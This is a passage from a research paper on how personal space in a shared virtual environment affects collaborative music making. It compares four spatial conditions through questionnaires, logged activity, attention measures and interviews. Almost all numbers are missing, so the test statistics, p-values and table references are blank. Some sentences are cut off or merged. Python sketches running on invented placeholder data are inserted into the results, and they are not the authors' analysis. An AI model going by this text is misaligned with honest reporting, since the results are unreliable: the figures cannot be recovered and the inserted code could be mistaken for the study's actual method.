participants reported that they made a significantly larger amount of contributions in cpub compared with cfix (w = . , p = . ) or with cmov (w = , p = . ), and made significantly more contributions in caug compared with cfix (w = . , p = . ), see psq . no significant difference was found in cq , which also asks about the feeling of one's own contribution. no significant differences were found in the ratings of the amount of the collaborator's contribution (psq ), except a trend of participants reporting that their collaborator made a lower amount of contribution in cfix than in cpub and caug (wilcoxon rank sum test, w = . , both p < . ). however, cq reveals that significantly few participants felt that their collaborator made the most contribution in cmov (binomial test, . < . , p = . , -sided). these results indicate that the addition of personal space in cfix and cmov possibly led to a weaker sense of the collaborator's activities.

activity assessments
this section reports on measures focusing on the participants' interactive activities. all measures are listed in table ; wilcoxon rank sum tests were run to compare conditions against each other.

contribution
( ) note edits (including note additions and deletions). on average, participants did . note edits in cfix, which is significantly more than the . of cpub, . of caug, and . of cmov (wilcoxon rank sum test, all p < . ). note additions, as the main part of note edits, follow a similar pattern: the number of note additions in cfix is significantly greater than that of cpub (w = , p = . ), and near-marginal significantly greater than that of caug and cmov (wilcoxon rank sum test, both p < . ; detailed statistics in aa , table ). no significant difference was found in note deletions between conditions; this is probably due to the much smaller number of deletions compared with the number of note edits and additions. these results indicate that participants made more musical edits, specifically note additions, in cfix than in the other conditions.
( ) mutual note modifications. cpub saw the highest average number of mutual note modifications (m = . , sd = . ); this is significantly more than cfix (m = . , sd = . ; wilcoxon rank sum test, w = . , p = . ) and cmov (m = . , sd = . ; wilcoxon rank sum test, w = . , p = . ). caug has the second highest mean (m = . , sd = . ), which is significantly more than cmov (w = . , p = . ), and near-marginal significantly more than that of cfix (w = . , p = . ). no significant difference was found between cpub and caug or between cfix and cmov. these results indicate participants made more mutual modifications in cpub and caug than in cfix and cmov, which might indicate a closer collaboration.
( ) number of note edits that fell into public/personal space. note that this measure is only applicable to rigid personal space, which was only available in cfix and cmov. participants did . (sd = . ) note edits in public space and . (sd = . ) note edits inside personal space in cfix; these numbers reduced to . (sd = . ) in public space and (sd = . ) inside personal space in cmov. although both numbers decreased, no significant differences were found between conditions.
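the comparisons reported in this section rest on two test families: pairwise two-tailed wilcoxon rank-sum tests between conditions for the rating and activity measures, and two-sided binomial tests against the chance level for the comparison-questionnaire votes. the sketch below shows, under stated assumptions, how such tests could be run with scipy; the condition ratings, participant counts and vote counts are illustrative placeholders rather than the study's actual values (which are not recoverable from the text here), and this is not the authors' analysis code.

```python
from itertools import combinations
from scipy.stats import mannwhitneyu, binomtest

# hypothetical 7-point Likert ratings for one PSQ item, one value per participant
ratings = {
    "CPub": [5, 6, 4, 5, 6, 5],
    "CAug": [6, 7, 6, 5, 7, 6],
    "CFix": [3, 4, 3, 4, 3, 4],
    "CMov": [5, 5, 6, 4, 5, 5],
}

# pairwise two-tailed Wilcoxon rank-sum (Mann-Whitney U) tests between conditions,
# as used for the PSQ items and the activity assessments (AA)
for a, b in combinations(ratings, 2):
    w, p = mannwhitneyu(ratings[a], ratings[b], alternative="two-sided")
    print(f"{a} vs {b}: W = {w:.1f}, p = {p:.3f}")

# two-sided binomial test for a comparison-questionnaire (CQ) item: did more (or
# fewer) participants than chance pick one condition? with four conditions the
# chance level is 0.25.
n_participants = 24       # hypothetical sample size
votes_for_cfix = 14       # hypothetical number of "most difficult" votes for CFix
result = binomtest(votes_for_cfix, n_participants, p=0.25, alternative="two-sided")
print(f"CFix rated most difficult by {votes_for_cfix}/{n_participants}: p = {result.pvalue:.4f}")
```

the sketch follows the rank-sum test named in the text; a repeated-measures alternative such as the wilcoxon signed-rank test would also be defensible for within-participant comparisons, but is not what the section reports.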
location and territory
to illustrate how participants used the space, based on the system-logged data, we plotted the positions and directions of participants' heads and their musical note edits on a top view of the stage; see fig. for an illustrative example of the visual traces of arbitrarily selected group . visual traces of all groups are shown in fig. . these figures were made from the system-logged data: the arrows are participants' locations at -second intervals (for ease of reading the diagram), and the dots are the locations of participants' hands when making musical note edits.

table : statistics and wilcoxon rank sum tests (two-tailed) of the activity assessments (aa). for each measure, the table reports the mean (sd) per condition (cpub, caug, cfix, cmov) and the p (w) values of the six pairwise condition comparisons; the individual values are not reproduced here. the measures are: aa —no. of note edits; aa —no. of note additions; aa —no. of note deletions; aa —no. of mutual note modifications (a); aa —size of group territory (m ); aa —size of personal territory (m ); aa —no. of group edits (note edits done in group territory); aa —no. of personal edits (note edits done in own personal territory); aa —no. of note edits done in the other's personal territory; aa —average distance between collaborators (metres); aa —no. of uses of personal spaces; aa —length of time of using personal spaces (seconds); aa —average duration of each entry of personal space (seconds) (b); aa —no. of note edits in public space; aa —no. of note edits in personal space; aa —time spent paying close attention to the collaborator (seconds) (c); aa —times of paying close attention to the collaborator (c); aa —time spent paying ordinary attention to the collaborator (seconds) (c); aa —times of paying ordinary attention to the collaborator (c); aa —no. of music interface additions; aa —no. of music interface additions in public space; aa —no. of music interface additions in personal space. notes: (a) mutual note modifications include activations/deactivations of notes whose last update was performed by the collaborator. (b) data of four participants ( b, a, b a) were excluded when calculating this metric as these participants did not use personal space, which made the metric not apply to them. (c) the difference between close attention and ordinary attention is the breadth and depth of the fov: the fov of close attention roughly covers degrees (horizontally), degrees (vertically) and m (depth), whilst the fov of ordinary attention roughly covers degrees (horizontally), degrees (vertically) and . m (depth).

figure : illustrative example of the visual traces of the participants' locations, directions and musical note edits (group ). arrows show a participant's position and direction at -second intervals; dots show a participant's hand position while performing note edits.

research on table-top collaboration defines personal territory as a workspace close to the person and group territory as the central area or the spaces between collaborators (xambó et al., ; scott, carpendale & inkpen, ; scott & carpendale, ). following this definition, we dye the area within a . -metre radius of the participants' locations (locations here are taken at -second intervals for higher accuracy) with different tint colours (red for participant a's personal territory, and blue for b's) to indicate territories. we chose . metres as it falls into the range of the close phase of personal distance and permits participants to touch each other or the same music interface (hall, ); most of the musical note edits also fell inside this range.
( ) distribution of locations and interactions. the more intensely blue or red an area is, the more presence the corresponding participant showed in that location. the overlap is coloured grey, indicating the presence of both participants, which can be seen as group territory.
( ) sizes of group territory and group edits (edits undertaken in group territory). by calculating the sizes of the red/blue/grey areas, the sizes of the personal/group territories can be calculated. specifically, participants formed an average of . m of group territory in cpub, . m in caug, . m in cfix and . m in cmov (aa of table ). results of the wilcoxon rank sum tests show that the size of the group territory of caug is significantly larger than that of cfix (w = , p = . ), and near-marginal significantly larger than that of cmov (w = , p = . ). no significant difference was found between cpub and caug. aa of table shows that participants made an average of . group edits in cpub, which is significantly more than the . of cfix (wilcoxon rank sum test, w = , p = . ), and near-marginal significantly more than the . of cmov (w = . , p = . ). caug resulted in a higher average of group edits (m = . ); though not significantly higher than cpub, it is significantly higher than the numbers of cfix and cmov (wilcoxon rank sum test, both p < . ). these indicate that the spatial configurations of cpub and caug are friendlier to group edits.
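as a companion to the territory definition above (discs of fixed radius dyed around each logged location, with the overlap of the two participants' dyed areas treated as group territory), the following is a minimal sketch of how territory sizes and the average collaborator distance could be estimated from system-logged head positions. the radius, grid resolution, stage size and the synthetic positions are assumptions for illustration (the paper's exact values are not recoverable from the text here), and this is not the authors' actual analysis code.

```python
import numpy as np

RADIUS = 1.2   # metres; placeholder for the paper's dyeing radius
CELL = 0.05    # grid resolution in metres (assumed)
STAGE = 6.0    # assumed square stage size in metres

def coverage_mask(positions, radius=RADIUS, cell=CELL, stage=STAGE):
    """Boolean grid marking every cell within `radius` of any logged position."""
    n = int(stage / cell)
    ys, xs = np.mgrid[0:n, 0:n] * cell + cell / 2.0   # cell-centre coordinates
    mask = np.zeros((n, n), dtype=bool)
    for px, py in positions:
        mask |= (xs - px) ** 2 + (ys - py) ** 2 <= radius ** 2
    return mask

# hypothetical logged head positions (metres) for participants A and B
pos_a = [(2.0, 2.0), (2.3, 2.1), (2.5, 2.4)]
pos_b = [(3.5, 3.6), (3.2, 3.4), (2.9, 3.0)]

mask_a, mask_b = coverage_mask(pos_a), coverage_mask(pos_b)
cell_area = CELL ** 2
group_territory = np.logical_and(mask_a, mask_b).sum() * cell_area      # grey overlap
personal_a = np.logical_and(mask_a, ~mask_b).sum() * cell_area          # A-only area
print(f"group territory ~ {group_territory:.2f} m^2, A's personal ~ {personal_a:.2f} m^2")

# average distance between collaborators over paired samples (cf. the AA distance measure)
dists = [np.hypot(ax - bx, ay - by) for (ax, ay), (bx, by) in zip(pos_a, pos_b)]
print(f"average collaborator distance ~ {np.mean(dists):.2f} m")
```

the grid rasterisation is just one way to approximate the union and overlap of the dyed discs; any polygon-union approach would serve equally well, and edits can be assigned to group or personal territory by testing which mask their logged hand position falls into.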
figure : visual traces—the participants' locations, directions and musical note edits shown on a top view of the stage (based on the system-logged data of all groups).

( ) sizes of personal territory (aa of table ) and personal edits (edits falling into personal territory; aa ). participants formed a significantly larger personal territory in cfix (m = . m , sd = . ) compared with all of the other three conditions (wilcoxon rank sum test, all p < . ), and made significantly more personal edits in cfix compared with the other conditions (wilcoxon rank sum test, all p < . ; aa ). similarly, a larger personal territory was formed in cmov and more personal edits were done in cmov compared with cpub and caug (all p < . ). no significant differences were found between cpub and caug, neither in the size of personal territory nor in the number of personal edits. to summarise, cfix resulted in the largest personal territory and the largest number of personal edits, the metrics of cmov follow, and cpub and caug have the least, indicating that cfix led to a much looser collaboration, in which participants worked more independently, whilst cpub and caug, in contrast, led to more interactivity in the group territory.
( ) average distance (aa of table ). participants had an average distance of . metres between themselves and their collaborators in cfix; this is significantly bigger than in the other three conditions (wilcoxon rank sum test, all p < . ). namely, in the other three sessions participants worked more closely together.

times and amount of use of personal space
as shown in aa , aa and aa of table , in cfix participants made an average of . entries into personal space, with each entry lasting . s on average and a total duration of . s. in cmov, participants made . entries, each lasting . s on average, with a total usage time of . s. no significant difference was found in the number of entries or in the total usage time; however, the average duration of each entry in cmov is significantly shorter than in cfix (wilcoxon rank sum test, w = , p = . ), indicating that the personal spaces of cfix were possibly used more for longer, independent creation.

attention
( ) time spent paying close attention to each other. throughout the -second session, participants directed their close attention toward their collaborator's head for . s in caug, which is significantly longer than the . s in cpub and . s in cfix (wilcoxon rank sum test, both p < . ), and near-marginal significantly longer than the . s in cmov (w = , p = . ; see aa in table ).
( ) times of paying close attention to each other. participants oriented their close attention toward their collaborator a significantly different number of times across conditions; they did so most often in caug (m = . ), which is significantly more than the . in cpub, . in cfix and . in cmov (wilcoxon rank sum test, cpub vs caug: w = . , p = . ; caug vs cfix: w = , p = . ; caug vs cmov: w = . , p = . ). the wilcoxon rank sum test results also show that participants paid close attention to their partner significantly fewer times in cfix than they did in cmov (w = , p = . ); see aa in table .
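before interpreting these attention measures, note that they are derived from logged head positions and facing directions using the fov-based definition in the table notes (a narrower, deeper cone for close attention and a wider, shallower one for ordinary attention). the sketch below illustrates one way such a classification could be computed; the angles, depths and sampling interval are placeholders since the exact values are not recoverable from the text, and this is not the authors' implementation.

```python
import numpy as np

def in_fov(own_pos, own_dir, other_pos, h_fov_deg, depth):
    """True if `other_pos` lies within the horizontal FOV cone and depth range."""
    own_pos, other_pos = np.asarray(own_pos, float), np.asarray(other_pos, float)
    to_other = other_pos - own_pos
    dist = np.linalg.norm(to_other)
    if dist == 0 or dist > depth:
        return False
    own_dir = np.asarray(own_dir, float) / np.linalg.norm(own_dir)
    angle = np.degrees(np.arccos(np.clip(np.dot(to_other / dist, own_dir), -1.0, 1.0)))
    return angle <= h_fov_deg / 2.0

SAMPLE_DT = 1.0                        # assumed logging interval in seconds
samples = [                            # (own position, own facing, partner position)
    ((2.0, 2.0), (1.0, 0.5), (3.0, 2.5)),
    ((2.1, 2.0), (0.0, 1.0), (3.0, 2.6)),
]

# placeholder thresholds: close attention = narrow/deep cone, ordinary = wide cone
close_time = sum(SAMPLE_DT for p, d, q in samples if in_fov(p, d, q, h_fov_deg=30, depth=2.0))
ordinary_time = sum(SAMPLE_DT for p, d, q in samples
                    if in_fov(p, d, q, h_fov_deg=90, depth=3.5) and not in_fov(p, d, q, 30, 2.0))
print(close_time, ordinary_time)
```

summing the per-sample classifications gives the time-based measures, and counting transitions into the cone gives the "times of paying attention" measures.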
these results indicate that the spatial configuration of caug significantly encouraged participants to pay more close attention to their collaborator, whilst, compared with cpub, cmov possibly promoted this and cfix possibly reduced it, though not significantly.
( ) the time participants spent paying ordinary attention to each other. different from the impact of the spatial configurations on close attention, neither caug nor cmov significantly changed the amount of ordinary attention participants paid; all fell inside the range from to s out of the -second session. cfix greatly reduced the ordinary attention participants paid to each other: on average participants spent only . s on doing this, which is significantly shorter than in cpub and caug (wilcoxon rank sum test, both p < . ) and near-marginal significantly shorter than in cmov (wilcoxon rank sum test, w = , p = . ); more details are shown in aa of table .
( ) similar to the time spent paying ordinary attention to each other, participants drew their ordinary attention to each other only an average of . times in cfix, which is significantly lower than in all the other three conditions (wilcoxon rank sum test, all p < . ; detailed statistics in aa of table ), indicating that the spatial configuration of cfix greatly reduced participants' ordinary attention to each other.

interviews
post-task interviews with participants revealed more reflective insights into the spatial configurations. around , words were transcribed and a thematic analysis of the transcription was undertaken; for more information about thematic analysis, see braun & clarke ( ) and yin ( ). the starting point of the thematic analysis was a read-through of the transcripts; we then did an inductive analysis of the data, collapsing relevant patterns into codes. next, these codes were combined into overarching themes, which were then reviewed and adjusted until they fit the codes well. as shown in fig. , in total, coded segments, codes and overarching themes emerged from the thematic analysis.

learning effects
members of groups mentioned the effect of the session sequence; specifically, coded segments contributed by participants were related to learning effects. participants reported that the sequence was an ''important factor'' (participant a, hereafter abbreviated to p a). the first session was felt to be hard as they were ''just being introduced to [the system and they were] still adjusting'' to it (p a), trying to ''[figure] out how the system was working'' (p a). when they ''were progressing into latter sessions, [they] felt easier to communicate and use gestures to manipulate the sound, being able to collaborate more, more used to the system'' (p b); these changes led to a higher level of satisfaction and more enjoyment in later conditions. it should also be noted that, interestingly, p a and p b reported the sequence effect adversely: they enjoyed the first session more because ''the first one was an element of surprise, a total surprise'' as that was ''the first time they were using the system''. that feeling of freshness made that session more exploratory and more joyful to them. these learning effects might affect the results of the post-session questionnaire and comparison questionnaire and thus should be well counterbalanced.

reporting the spatial configurations
( ) cpub - simple but can be chaotic.
since there was no personal space, participants could, and had to, hear all the interfaces all the time. in total, coded segments are about the disadvantages of this setting; some examples are: ''a bit troubling'' (p b), ''music [was] always very loud'' (p a), ''it was global music, and there was someone annoying'' (p a), ''[they were] not going to say anything'' about disagreement because that could possibly make them appear to be ''rude'' (p a). it would have been easier if there were something helpful ''to perceive what [they were] doing, and not get confused with what [their collaborator] was doing'' (p b); it was too ''chaotic'' (p a), ''too confusing'' (p a & p b), ''annoying'' (p b). they ''cannot concentrate'' (p b), ''everything [was] open and quite noisy'' (p b), and they didn't ''have the tranquillity to operating [the] sounds...everything [came] mixed, which [was] difficult to manage'' (p a). there were coded segments from participants reporting the positive side of cpub; some examples are: (i) pieces created in ''personal space'' might clash in a musical way (p a), and it is ''better to work when knowing how it sounds all together'' (p b), so music pieces might match better; (ii) better for providing help to the other: according to p a, they needed someone to lead them and thus the ability to hear all the work all the time was helpful; (iii) ''space wise'', namely, no space limitation: compared with having to work closer to ''hear the sound well'' (p a), cpub does not have this constraint, so they could choose to work ''anywhere'' (p a); (iv) ''easier'' to understand the condition (p b), with fewer confusions when simply being able to hear all the things all the time (p a); (v) ''collaborative wise'' (p a), less separation and better collaboration compared with conditions where ''personal space'' was provided (p b, p a and p b).

figure : ingredients of all the coded segments of the interview, grouped into reporting learning effects, reporting the spatial configurations (per condition: most favourite, second favourite, most unfavourite, advantages and disadvantages of the condition) and reporting the lemo system (advantages of the system, disadvantages of the system, suggestions, other); the numbers of coded segments are shown along the bars.

( ) caug - the most favoured condition. there were coded segments contributed by participants favouring condition caug, higher than the segments contributed by participants for cpub, the segments contributed by eight participants for cfix, and the segments contributed by participants for cmov (the sum of the numbers of contributors here is greater than as a few participants reported more than one favourite condition in the interview). the reason for this popularity can be concluded from the overwhelming coded segments from participants from groups reporting the advantages of this condition, much higher than the number of segments reporting other conditions' advantages. caug's advantages reported by participants can be grouped into four groups: (i) higher team cohesion and less sense of separation.
participants reported that without the rigid personal space, they had to ''work with the other person'' (p a). with no rigid personal space, caug ''forced [them] to collaborate more...because [they] had to stay very close'' to compose music (p b). (ii) an appropriate environment for creativity, more consistency and convenience. as described by participants, it was ''a middle point between personal space and no personal space'' (p a); without even triggering something, ''[they] could decide in a continuous way'' ''whether [they] were able to listen to the other sound sources or not, [and] to what extent [they] wanted to isolate [themselves]'' (p a). compared with having to hear all sounds in cpub, this provided them with a ''less stressing'' (p a) context, and they could selectively move away to avoid ''getting interrupted with the other'' (p b) and overlapping music. compared with cfix and cmov, being able to still ''hear a bit of it in the background but not completely'' (p a) was reported to be good, as this kept them ''up to date'' (p a) and helped them to ''tailor what [he/she] was making'' (p b) to match the co-created music, and to make something new and see if it ''fit with'' (p a) the old. caug provided them with ''a little bit of personal space'', although not quite a ''defined thing'' (p a), which provided the possibility ''to work on something individually'' and to ''share work quite easily'' (p a). (iii) easier to identify sounds. participants reported that it was easier to ''locate the source of the sound'' (p a) and ''perceive what [they were] doing'' (p b); these factors then helped them ''understand instruments better'' (p b) and ''not get confused'' (p b). (iv) more real. quite interestingly, instead of cpub, which simulates the acoustic attenuation of the real world, it was caug that was reported to be similar to the experience of the real world. participants reported that in caug ''if [they] want to hear something, [they] just come closer, like in the real world'' (p b & p b), ''feeling like the real-time experience'' (p b). it should also be noted that, along with these coded segments reporting the advantages provided by caug, there are segments reporting its limitations. these limitations fall into three groups: (i) a preference ''to hear all the instruments all the time'' as in cpub (p b), (ii) caug might lead to ''another type of compositions'' and ''influence the piece'' (p b), and (iii) not being able to hear all sounds led to a feeling of separation (p a).
( ) cfix and cmov - resemblance and differences. regardless of the mobility, the personal spaces provided by cfix and cmov share the same characteristics. not surprisingly, the participants reported many common advantages and disadvantages shared by both conditions, including: the addition of rigid personal space was described as an ''added advantage'' (p a); it made it ''easier to perceive what [they were] doing and not get confused with what [their collaborator] was doing'' (p b), provided them with a chance to ''isolate themselves to create their piece'' (p a) and to ''think about something to add'' (p a), and helped them to ''develop their own ideas'' (p a). as a result, they used personal space ''a lot [and] used [their] own creativity much more comparing with [other two sessions]'' (p a & p b).
common disadvantages reported include: the rigid form led to segmentation and a feeling of being ''forc[ed]'' to work on something individually (p a), making them ''forget'' the collaboration and the collaborator (p a & p a), resulting in less collaboration and less ''communication happening'' (p a); they ''lost the idea of the joint music piece'' (p a & p b), and, as a possible result, each other's music pieces did not fit when brought up (p a). p a reported that they were not familiar with music and thus ''needed somebody to lead'' them, so they preferred to hear all sounds all the time. besides, p b reported that the visual personal space made the stages look ''messy''.
differences between cfix and cmov—in total, coded segments (from participants) reported cmov's advantages and segments (from participants) reported its disadvantages, compared with segments (from participants) and segments (from participants) for cfix, indicating that in general participants thought cmov better than cfix. some example insights behind the preference are: cmov functioned like a ''mute button'' (p b), which could be used anywhere (p b), enabling them to ''move around'', work ''closer...and see each other's things'' and thus leading to ''more collaboration'' between them (p b). though cfix had no advantages in these respects, the location at the opposite corners provided a more ''personal feeling'' and a higher sense of belonging (p a & p b). walking to the corner to access personal space was not a big issue for p b & p a as ''the boundary is small''. besides, the relatively far distance also helped to ''prevent [them] from clashing'' (p a).

discussion
the key question that this paper tries to address is how shared virtual environments should be designed to support creative collaboration. to help answer this question, a better understanding of the role of personal and public space is needed, given that previous research has highlighted the necessity of providing personal space with a fluid transition to public space during collaboration (scott, carpendale & inkpen, ; shen, everitt & ryall, ; sugimoto, hosoi & hashizume, ) and also that people do form public and personal space in collaboration in ves (men & bryan-kinns, ). next, based on the results, we will discuss (i) the necessity and (ii) the impacts of adding each type of personal space, then make comparisons between (iii) conditions providing personal space with and without mobility, and (iv) conditions providing personal space with rigid and fluid boundaries.

necessity of adding personal space
when no personal space was available, cpub was reported to provide the experience of the least difficulty in tracking the collaborator (cq in table ), the strongest sense of the collaborator (cq ), the best communication quality (cq ), and the least difficulty in cooperating (cq ). so cpub seems to be the simplest of these four configurations for participants to learn and get used to. however, the issues of having no personal space are clear. firstly, especially for the music making task in this study, participants reported in the interviews that the background could be too messy to develop their own ideas in; their creativity requires a quieter and more controllable environment. considering that individual creativity forms an important part of collaborative creativity, providing an appropriate environment is crucial.
the personal space provided in caug, cfix, and cmov functioned like a ''less stressing'' context, within which participants could better ''understand instruments'' and not ''get confused''. secondly, participants need an opportunity to develop their own ideas. from the interview results, having personal space was reported to be ''an added advantage'': it helped to promote their own creativity, which was then combined with and contributed to the joint piece. this echoes the findings in men & bryan-kinns ( ) that providing personal spaces is helpful as it provides a chance to explore individual ideas freely, which then adds an interesting dynamic to the collaborative work. though some disadvantages of having personal space were also reported, e.g., less communication, higher isolation and messiness, most of these limitations were possibly the result of introducing rigid visible personal space, and caug was found to have addressed these limitations well (details will be discussed in later subsections). next, we discuss the impacts of introducing each of these personal spaces individually by comparing their condition with cpub.

impacts of adding personal space
as mentioned above, the previous study (men & bryan-kinns, ) found that the addition of personal space located at the opposite side of the public space led to a shrunken group territory, fewer group note edits, a larger personal territory, more personal note edits, a larger average distance between collaborators, and fewer times of paying attention to collaborators. we argued that these negative impacts arose mainly because, in that study, the personal spaces being placed on the opposite side of the group space resulted in a larger distance between participants. so we proposed that personal space with different features (e.g., the gradual boundary in caug, the mobility in cmov) might reduce, or even minimise, these negative effects. next, the impacts of introducing the newly-featured personal spaces in caug, cfix, and cmov, and how these negative effects might be eliminated or minimised, will be discussed.

invisible auditory personal space in caug
caug is quite similar to cpub in many ways: e.g., both have no visual boundary for personal spaces and no visual triggers for personal space, and similar territorial patterns were formed in these two conditions (fig. ). not surprisingly, no significant differences were found in most of the statistical measures listed in tables and . the only differences revealed in these two tables are the significant differences found in aa and aa —significantly more occurrences and a longer duration of close attention were paid to the collaborator in caug—and a marginal-significant difference in psq —the sense of the collaborator's activity is higher in cpub than in caug. from another perspective, the fewer differences between cpub and caug
all these similarities indicate that by introducing a personal space with gradual and invisible boundary, these identified disadvantages of introducing personal space have been successfully eliminated. reasons can be that caug managed to provide a similar interaction experience to cpub. in the previous study (men & bryan-kinns, ), to access the personal spaces located at the opposite side of the public space, participants had to drift apart, which might have influenced the their spatial locations, changed the formation of group/personal territory they formed and the average distance between collaborators changed, and territoriality-based interaction (group/personal edits) changed. here in caug, by enabling participants to use personal space anywhere inside the stage with no specific triggers needed, caug managed to provide a user experience as similar as possible to cpub. the second reason is more related to the impacts on subjective experience, by making the personal space invisible and gradual, the isolation and difficulty of coordinating that introduced by the additional rigid personal space was minimised. for instance, in the interview, participants reported caug provided a proper level of group work as a working context, making easier to create new that matches the old. movable personal space in cmov in cmov, participants could pop up the personal space anywhere in the stage. in this way, personal spaces was provided with mobility. by doing so, several aforementioned negative effects found in men & bryan-kinns ( ) were reduced. specifically, these include the size of group territory, the average distance, times of paying attention to collaborator (respectively, aa , aa , aa , and aa in table ). however, some significant differences remained, participants still had significantly fewer mutual note modifications, marginal-significantly fewer group edits and significantly more personal edits after personal space being introduced in cfix and cmov (respectively, aa , aa , and aa in table ). this can also be verified by the interview results. compared with caug, participants reported a higher sense of isolation in cmov and cfix, both providing rigid-form personal spaces. namely, cmov, by making the personal space available anywhere in the stage, managed to drag participants closer, saw a similar group territory, however, participants’ behaviour was still affected in many ways. participants were still separated to some extent, which can be seen as a disadvantage of adding visible, solid personal space. in other words, cmov did better than cfix in minimising the negative impacts of adding personal space, but not as good as caug. a more rigid personal space in cfix cfix provided a much more inflexible personal space, which influenced participants’ behaviour in many ways (see the significant differences between cpub and cfix in tables and ). not to mention participants’ polarised ratings on cpub and cfix in cq , cq , men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. cq , cq of table : significantly many participants reported the least difficulty of tracking collaborator’s activities (cq ), the strongest sense of their collaborator’s presence (cq ), the best communication quality (cq ), the least difficulty of cooperating with collaborator (cq ) happened in cpub, whilst cfix was thought conversely by significantly many participants. 
their dislike of cfix can also be seen in the interviews, in which the number of coded segments favouring cfix and the number of segments reporting its advantages are the lowest, whist the number of segments disfavouring it and the number of segments reporting its disadvantages are the highest among the four conditions. providing personal space with fluid boundary measures in table show that caug significantly differs from cfix and cmov in many ways. when both significant differences (p < . ) and marginal-significant differences (p < . ) are considered, compared with cfix and cmov, caug saw a smaller personal territory (aa ) and a bigger group territory (aa ), more mutual modifications (aa ), more group edits (aa ) and fewer personal edits (aa ), a larger distance between collaborators (aa ), more times of paying close attention (aa ) and a longer time of paying close attention (aa ). all these indicate that compared with the rigid personal space provided in cfix and cmov, the augmented acoustic attenuation in caug enabled a closer collaboration, h is therefore supported. caug’s advantages are shown in three ways, next, each will be specified. enough support for creativity with minimal impacts psq (table ) questioned the support each condition gave to individual creativity. although no significant differences were found, caug has a higher mean rating, possibly indicating a higher level of support. it should be noted that all the questions in psq were phrased either positively (psq , psq , psq , psq , psq ) or neutrally (the rest), with no negative statements, which might have affected participants’ ratings positively. however, this imperfection has a limited influence on this study, because psq results are mostly used for comparisons between conditions, which are affected equally due to all of the conditions using the same phrasing. more insights regarding caug’s helpfulness are revealed by the thematic analysis, according to which, caug provided both ‘‘an appropriate background’’ with which participants felt ‘‘less stressed’’ and were able to ‘‘tailor’’ the individual composing to match the co-work, and a space personal enough to ‘‘work on something individually’’. no major differences were found between cpub and caug, indicating caug provides a very mild solution, with limited impacts on people’s collaborative behaviour being introduced, whilst still providing sufficient support for individual creativity during collaboration. thus h is validated. closer collaboration and higher consistency according to measures of attention (aa , aa , aa , aa in table ), compared with other conditions, in caug participants paid more close attention to their collaborator. possible reasons for this can be found from the thematic analysis and other measures of activity assessments (table ). compared with realistic acoustic attenuation in cpub, caug’s augmented acoustic attenuation setting forced or prompted people to work closer in order to hear each other’s work, as reported by some participants. compared with men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
adding personal space with a visible rigid boundary, by enabling participants to ''decide'' whether to hear the other's work or not ''in a continuous way'', the invisible gradual boundary in caug led to less separation and higher consistency between personal and public space, which matches the finding that people would like to be able to smoothly shift their artifacts from personal to public with intermediate shades in between (greenberg, boyle & laberge, ). compared with the rigid personal spaces in cfix and cmov, caug saw more mutual note modifications, more group note edits, a larger group territory, and a closer average distance between collaborators (respectively, aa , aa , aa , and aa in table ); all of these indicate that caug saw a less separated collaboration than cfix and cmov. compared with the three levels of privacy provided in ubitable (shen, everitt & ryall, ) and the binary levels of privacy provided in sharednote (greenberg, boyle & laberge, ), the step-less sonic privacy provided by caug in this study possibly managed to better echo the suggestion that a boundary between personal and public space should be provided with gradations in subtle and lightweight ways to enable a fluid shift (greenberg, boyle & laberge, ); h is therefore supported.

popularity
the code ''advantage of caug'' has coded segments, which is far more than the segments other codes have. thirty-five coded segments are ''most favourite—caug'', higher than for all other three conditions. these indicate caug is the most popular condition. this can also be partially verified by the preference measure: specifically, caug has the highest preference rating in psq (table ), and more participants chose caug as the setting they most enjoyed in cq (in table ). we believe the reasons behind this popularity are mainly due to its unique advantages, which, as reported by participants, include: (i) higher team cohesion and less sense of separation, (ii) an appropriate environment for creativity, (iii) easier identification of sounds and (iv) feeling more real (though in fact, cpub is more real from the perspective of simulation). these features of caug made it provide better support for collaborative creativity and therefore led to its popularity.

providing personal space without/with mobility
this subsection compares cfix with cmov. the clear, sole difference between these two conditions is the mobility of the personal space. in cfix, to access the personal spaces at the corners, participants needed to physically walk away from the centre and head to the corner, which might be the reason that cmov saw a closer average distance between collaborators than cfix (aa , table ). this greater distance in cfix possibly resulted in the significantly larger personal territories (aa ) and more personal edits (aa ) in cfix. in contrast, the closer distance in cmov created more chances for participants to pay or draw attention to each other; as a result, significantly longer time was spent paying attention to collaborators (aa , aa in table ). with a closer average distance and more attention paid to each other, participants reported a marginal-significantly better quality of communication in cmov (psq of table ). on the other hand, with participants being far away from each other and having fewer chances for contact in cfix, significantly many participants reported that they had the worst communication quality in cfix (cq , table ).
cmov was also rated the least enjoyable condition by far fewer participants than cfix was (cq , table ). besides, cfix also led to a reduced sense of the collaborator's contribution (cq in table ). as a possible result, cmov saw a significantly more satisfying work output (psq , table ). the thematic analysis results also echo these findings: more coded segments report cmov's advantages than report cfix's, and more coded segments report cfix's disadvantages than report cmov's. also, more coded segments favour cmov than favour cfix. participants reported that being able to use the personal space anywhere on the stage was good as it resulted in a closer distance, which led to more collaboration and made it possible to see each other's work. to conclude, compared with cfix, cmov resulted in a better communication quality, produced a better feeling of the collaborator's contributions, and was rated more enjoyable; thus it saw a closer collaboration and produced a more satisfying result, and h is therefore supported.

key findings
in summary, the following are key findings from our results:
• having personal space is suggested as it supports individual creativity, which is an important element of collaborative creativity.
• caug minimised the negative impacts introduced by adding personal space (previously identified by men & bryan-kinns, ) better than cfix and cmov.
• caug was found to have the most minimal impacts and even to influence the attention between collaborators positively. both cfix and cmov produced a more alienated collaboration, indicators of which include a significantly bigger personal territory and more personal edits, significantly fewer mutual note modifications and fewer group edits, and a significantly lower sense of the collaborator's activity. additionally, cfix saw significantly more note edits, and significantly less ordinary attention paid between collaborators.
• providing personal space with a fluid boundary is preferable: it provides enough support for individual creativity at minimal cost, and can even lead to a closer collaboration (specifically, greater attention was paid between collaborators).
• compared with stationary personal space, space with mobility led to better communication, produced a better feeling of the collaborator's contribution, had a higher rating in enjoyment, and produced a more satisfying output; thus it supported collaboration better than stationary personal space.

design implications
based on the key points made above, we suggest five design implications for sves focusing on supporting creative collaboration (point is for audio-related tasks only):
( ) sves supporting creative collaboration tasks should come with personal space, as it provides essential support for the development of individual creativity, which forms a key part of collaborative creativity. this is especially essential when the output of the task is more disruptive (e.g., audio); co-workers need a space where they can think and develop their own ideas and work.
( ) for audio-related tasks (e.g., collaborative music making), manipulating acoustic attenuation as personal space is an effective way to support both individual creativity and collaboration. it allows users to shift between personal and public working space continuously by adjusting their relative distance.
